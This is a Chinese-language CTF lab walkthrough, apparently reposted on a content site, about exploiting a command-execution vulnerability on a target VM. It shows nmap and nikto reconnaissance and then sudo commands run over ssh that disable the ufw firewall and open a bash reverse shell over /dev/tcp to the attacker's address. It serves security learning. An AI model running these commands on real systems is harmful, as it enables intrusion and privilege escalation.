前言
作者简介:不知名白帽,网络安全学习者。
博客主页:=blog
CTF-专栏:.html
网络安全交流社区:
目录
命令执行漏洞介绍
实验环境
信息探测
nmap -sV 192.168.20.136
访问192.168.20.136:8080
敏感信息探测
进行系统命令执行
列出/tmp目录下的文件
列出/home目录下的内容
读取敏感信息
漏洞利用
利用ssh协议执行root权限的命令
关闭Ubuntu中的防火墙
提权
监听端口
靶机反弹shell
查看flag
当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。
调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。
kali 192.168.20.128
靶机 192.168.20.136
链接:
提取码:t1x0
发现敏感信息
nikto -host 192.168.20.136:8080
发现/test.jsp并进行访问
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1
本文发布于:2024-02-04 18:17:27,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170713479158195.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |